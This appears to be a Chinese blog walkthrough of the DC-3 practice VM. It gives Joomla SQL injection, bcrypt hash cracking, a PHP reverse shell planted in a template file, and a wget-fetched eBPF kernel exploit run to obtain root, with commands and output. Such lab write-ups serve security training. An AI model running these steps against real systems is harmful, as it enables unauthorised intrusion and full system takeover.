Twosmi1e's Blog.

DC-3渗透报告

靶机渗透 wp
Word count: 642 / Reading time: 4 min
2019/10/21 Share

Alt text
扫一下IP找到DC-3IP
Alt text

信息收集

  • nmap
    1
    nmap -A 192.168.61.144 -p 1-65535

Alt text
80web服务 Joomla

  • whatweb
    1
    whatweb http://192.168.61.144/
1
http://192.168.61.144 [200 OK] Apache[2.4.18], Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.61.144], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]
  • nikto
1
nikto -h http://192.168.61.144

Alt text

使用Joomscan
Alt text
Alt text
知晓版本Joomla 3.7.0
Alt text
发现有sql注入的洞
searchsploit -m 42033
cat 一下txt
Alt text

SQL注入

爆库
Alt text
爆表
Alt text
Alt text
爆字段
Alt text
爆内容
Alt text

john破解hash

1
2
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > joompass.txt
john joompass.txt

Alt text

写shell反弹

登入网站后台
修改templates/beez3/error.php写入一句话
Alt text
连不上 用PHP反弹shell

1
2
3
4
5
root@kali:~# locate php-reverse-shell.php
/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

选一个用
写入error.php
Alt text

设置IP端口 监听端口 反弹回shell
Alt text
看一下权限
Alt text

提权

然后提权
查看系统信息

1
2
3
4
5
6
7
8
9
10
11
$ cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

是Ubuntu 16.04的
Alt text
找一个本地提权的
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Alt text
用wget下载下来
Alt text
这个目录没有权限 切换到/tmp/下 创建一个exp目录

1
2
3
4
$ mkdir exp
$ ls
$ cd exp
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Alt text
解压给权限运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ chmod +x compile.sh
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
$ ls -la
total 60
drwxr-x--- 2 www-data www-data  4096 Jul  8 22:14 .
drwxr-xr-x 3 www-data www-data  4096 Jul  8 22:12 ..
-rwxrwxrwx 1 www-data www-data   155 Apr 26  2016 compile.sh
-rwxrwxrwx 1 www-data www-data 12336 Jul  8 22:14 doubleput
-rw-r----- 1 www-data www-data  4188 Apr 26  2016 doubleput.c
-rwxrwxrwx 1 www-data www-data  8028 Jul  8 22:14 hello
-rw-r----- 1 www-data www-data  2186 Apr 26  2016 hello.c
-rwxrwxrwx 1 www-data www-data  7524 Jul  8 22:14 suidhelper
-rw-r----- 1 www-data www-data   255 Apr 26  2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root

Alt text
然后看flag
Alt text

原文作者: two_smi1e

原文链接: https://www.twosmi1e.com/2019/10/21/DC-3渗透报告/

发表日期: October 21st 2019, 1:59:12 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 信息收集
  2. 2. SQL注入
  3. 3. 写shell反弹
  4. 4. 提权
Total : 36
2020
2019
2018
2017
ctf php 漏洞复现 靶机渗透 wp Django 安全开发 学习笔记 web安全 总结 OWASP10 编程相关 中间人攻击 漏洞分析 内网 同源策略 前端安全 SQL注入 随笔
ctf